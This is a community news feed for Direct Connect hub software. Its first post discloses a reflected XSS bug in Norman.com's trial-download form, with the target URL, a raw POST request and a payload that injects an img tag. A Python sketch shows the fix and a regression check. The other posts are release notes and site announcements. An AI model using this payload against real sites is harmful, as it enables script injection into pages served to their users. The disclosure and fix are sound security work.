
Norman.com download submission form XSS bug

Vulnerable page: http://www.norman.com/home_and_small_office/trials_downloads/

The specified page shows a frame linked from http://newton.norman.com/, so you have to post to that frame in order for the XSS to work.

PoC
POST /reg.php HTTP/1.1
Host: newton.norman.com
name="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in the name input box, or request any XSS code directly using the POST method and the name parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2016-04-09 23:27 0 comments 7 likes
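
The PoC in the post above relies on the name value being reflected into the page without output encoding. The Python sketch below is an added example, not part of the original post and not Norman's code: it assumes the value is echoed into a double-quoted value attribute (the form markup and function names are hypothetical), and shows the encoded rendering next to a parser-based regression check that uses the payload from the PoC.

```python
import html
from html.parser import HTMLParser

# Payload copied from the name parameter in the PoC above.
POC_NAME = '"><img src=http://te-home.net/images/logo.png>'

def render_vulnerable(name):
    # Assumed server behaviour: the submitted value is echoed back unescaped.
    return '<form><input type="text" name="name" value="' + name + '"></form>'

def render_hardened(name):
    # Encode &, <, > and both quote characters before placing the value
    # inside a quoted attribute, so it cannot close the attribute or the tag.
    return ('<form><input type="text" name="name" value="'
            + html.escape(name, quote=True) + '"></form>')

class TagCollector(HTMLParser):
    """Records every start tag and the decoded value attribute of <input>."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")

def parse_field(markup):
    # Parse the rendered markup the way a browser would tokenize it.
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.input_value

def injected_tags(markup, expected=("form", "input")):
    # Any element the template did not emit itself came from user input.
    tags, _ = parse_field(markup)
    return [t for t in tags if t not in expected]

if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        out = render(POC_NAME)
        print(render.__name__, "->", injected_tags(out), parse_field(out)[1])
```

With encoding in place the parser sees only the template's own elements, and the field still round-trips the submitted text as data.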

Verlihub 1.0.0.0

First stable release in 1.0.0.0 series.

Changes in 1.0.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.0.0
Posted by verlihub on 2016-04-05 10:54 1 comment 8 likes

DCHublist.com

Many of you are probably wondering: What really happened with DCHublist.com and why is it pointing here? Yep, that's right, it's pointing here because I am a close friend of the people who wrote and managed it during all these years. Time has passed and the developers were no longer interested in keeping it, so they left it to me, both source code and domain name. Now dchublist.com is redirecting to our own hublist.

By the way, if you are missing something that used to be on DCHublist.com, please send us a feature request either by forum or contact form, I'm sure that your feature will be added, mainly because I'm the developer here.

Oh, also all client side lists that are still present in most DC clients are still working, with a single redirect though. The complete URL list can be found here.

Have fun using Team Elite Hublist.
Posted by RoLex on 2016-03-30 12:50 3 comments 9 likes

Happy Easter

Happy Easter
Posted by RoLex on 2016-03-26 13:42 2 comments 8 likes

Ledokol 2.8.9.16

Changes in 2.8.9.16
[  6] Fixed: Chat replacer feature now replaces all occurrences of an entry instead of first only
[  6] Fixed: Possible error when unloading Lua plugin, report by KCAHDEP
[ 11] Fixed: Search filter block list was never blocking
[ 12] Fixed: Escape of special characters in chat messages from other scripts, report by KCAHDEP
[ 12] Fixed: Incorrect position of next word in chat replacer, report by KCAHDEP
[ 13] Fixed: Error when setting some configurations to empty value
[  5] Added: Support for new VH_OnParsedMsgSupports callback
[  8] Added: Search filter actions 8 and 9 to block all next search requests from user, action 8 is silent
[  9] Added: Chat replacer exception types, 0 = nick, 1 = IP and 2 = LRE, request by KCAHDEP
[ 10] Added: Hub URL to user information when available
[ 11] Added: sefiblockdel to delete user from search filter block list on logout
[ 11] Added: sefibllist command to show users in search filter block list
[ 11] Added: sefibldel command to delete users from search filter block list
[ 14] Added: Take advantage of VH_OnSetConfig callback if supported by hub
[ 15] Added: Support for opchat_to_all script command, external scripts can use this to send operator chat history line to Ledokol
[ 16] Added: Requirement to gain some uptime in order to use public and private chats and related commands
[ 16] Added: Notification on low registration, search and chat uptimes
[  7] Removed: Infected user redirect to AVDB quarantine hub

File information: Ledokol 2.8.9.16
Posted by ledokol on 2016-03-23 14:41 0 comments 5 likes